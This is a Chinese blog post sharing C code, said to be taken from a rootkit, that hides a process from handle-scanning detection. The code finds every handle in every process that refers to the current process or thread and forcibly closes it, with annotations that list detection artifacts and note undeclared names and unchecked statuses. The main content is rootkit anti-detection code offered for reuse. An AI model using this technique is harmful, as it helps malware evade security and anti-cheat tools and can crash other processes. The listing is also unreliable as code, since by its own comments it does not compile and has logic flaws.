抹掉所有进程中自己的句柄

之前听过一个检测进程的想法,就是暴力枚举所有进程中的handle,查找其中类型为PROCESS的.
此法也被炉子牛用于他的LzOpenProcess().
下面我就写了一段代码来对抗这个方法,纯属小伎俩,牛牛们飘过~
严格说,此段代码不算原创,是从某rootkit的bin中扒出来的,因此基本保留其原貌,经我修改测试,主要函数如下:
// Enumerate the system-wide handle table (ZwQuerySystemInformation /
// SystemHandleInformation), find the kernel object addresses of the current
// process and current thread, then close every handle in every process that
// refers to either object (ZwDuplicateObject with DUPLICATE_CLOSE_SOURCE).
//
// Detection/risk notes for reviewers:
//  - This is the counter-measure to handle-table scanning described in the
//    article above; the observable artifacts are a ZwOpenProcess with
//    PROCESS_DUP_HANDLE against every owning PID and handles disappearing
//    from other processes while they are in use. Closing a handle that a
//    foreign process still relies on is destabilising for that process.
//  - Several names are not declared in this listing (pHandleInfo,
//    my_GetProcessId, my_GetThreadId, PSYSTEM_HANDLE_TABLE_ENTRY_INFO,
//    CLIENT_ID, the Zw* prototypes); the listing does not compile as-is.
//  - No return status is checked except the allocation; see per-line notes.
//  - Object addresses are read as DWORD and handle/PID values are truncated
//    to USHORT, so a 32-bit build with the legacy 16-bit-field handle entry
//    layout is assumed — TODO confirm against the struct definition used.
void CloseAllmyHandles()
{
HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle;
// Probe handles to our own process/thread; stay INVALID_HANDLE_VALUE if the
// opens below fail, which is never checked.
HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE;
// nBufferLen is the fixed 0x40000-byte query buffer size (in/out for the
// allocation call); nRetnLen receives the size the query needed.
DWORD pid,nBufferLen=0x40000,nRetnLen=0;
DWORD HandleCnt,NumberOfHandles;
// Kernel object addresses of our process/thread; 0 means "not found".
DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject;
CLIENT_ID myCid,tmpCid;
PVOID pBuffer = NULL;
NTSTATUS status;
OBJECT_ATTRIBUTES ObjectAttributes;
myCid.UniqueProcess =(HANDLE)my_GetProcessId();
myCid.UniqueThread=(HANDLE)my_GetThreadId();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
// NOTE(review): neither open is status-checked, and the thread open passes
// the process access mask (PROCESS_ALL_ACCESS) rather than a thread mask.
ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
printf("hMyProcess:0x%08x\n",hMyProcess);
printf("hMyThread :0x%08x\n",hMyThread);
hCurProcess = GetCurrentProcess();
// Commit a fixed-size buffer for the handle table; this is the only call
// whose status is checked.
status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE);
if (!NT_SUCCESS(status))
{
printf("Alloc Memory failed.\n");
return;
}
printf("Alloced Buffer:0x%08X\n",pBuffer);
// NOTE(review): status and nRetnLen are ignored. If the live handle table
// does not fit in 0x40000 bytes the query presumably fails and the buffer
// content (freshly committed, so likely zeroed) is parsed anyway.
ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation
printf("Searching handles...\n");
// First DWORD of the buffer is the entry count; entries follow immediately.
HandleCnt=*(DWORD *)pBuffer;
printf("Handle Count:%d\n",HandleCnt);
// Pass 1: locate our own process and thread objects by matching the probe
// handle values owned by our PID. (Skipped when exactly one entry exists;
// pass 2 below uses >=1, so the two guards are inconsistent.)
if (HandleCnt>1)
{
NumberOfHandles=*(DWORD*)pBuffer;
// pHandleInfo is not declared in this listing — assumed to be a
// file-scope PSYSTEM_HANDLE_TABLE_ENTRY_INFO.
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
//printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue);
// Handle value and PID are compared after truncation to USHORT to match
// the entry's 16-bit fields.
if ( pHandleInfo->HandleValue==(USHORT)hMyThread )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess )
{
// Low 32 bits of the entry's Object pointer.
pMyThreadObject = *(DWORD*)&(pHandleInfo->Object);
printf("Thread finded\n");
}
}
if (pHandleInfo->HandleValue==(USHORT)hMyProcess )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess)
{
pMyProcessObject =*(DWORD*)&(pHandleInfo->Object);
printf("Process finded\n");
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
// Release the probe handles before pass 2 so they are not among the
// handles matched below.
ZwClose(hMyThread);
ZwClose(hMyProcess);
// NOTE(review): printed even when pass 1 found nothing; in that case
// pMyProcessObject/pMyThreadObject are still 0 and pass 2 compares every
// entry's Object field against 0.
printf("Found my object ok.\nBegin Search and Close...\n");
NumberOfHandles=HandleCnt;
// Pass 2: for each entry that points at one of our objects, open its owner
// with PROCESS_DUP_HANDLE and close the handle from under that process.
if (HandleCnt>=1 )
{
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
pObject = *(DWORD*)&(pHandleInfo->Object);
if ( pMyProcessObject == pObject || pMyThreadObject == pObject )
{
printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId);
tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId;
tmpCid.UniqueThread=0;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL );
status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid);
//PrintZwError("ZwOpenProcess",status);
// `!status` accepts only STATUS_SUCCESS (0); other success codes are
// treated as failure here and below.
if (!status)
{
// DUPLICATE_CLOSE_SOURCE removes the handle from the owning process;
// the duplicate we receive is discarded immediately afterwards.
status=ZwDuplicateObject(
hSouceProcessHandle,
(void*)pHandleInfo->HandleValue,
hCurProcess,
&hTargetHandle,
0,
0,
DUPLICATE_CLOSE_SOURCE);
if ( !status)
{
ZwClose(hTargetHandle);
printf("Handle closed!\n");
}
//PrintZwError("ZwDuplicateObject",status);
ZwClose(hSouceProcessHandle);
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
// nBufferLen may have been rounded by the allocation call; it is reused as
// the region size here. Return status unchecked.
ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE);
}
文章地址:http://www.jxjierui.cn/article/dhpgdhi.html


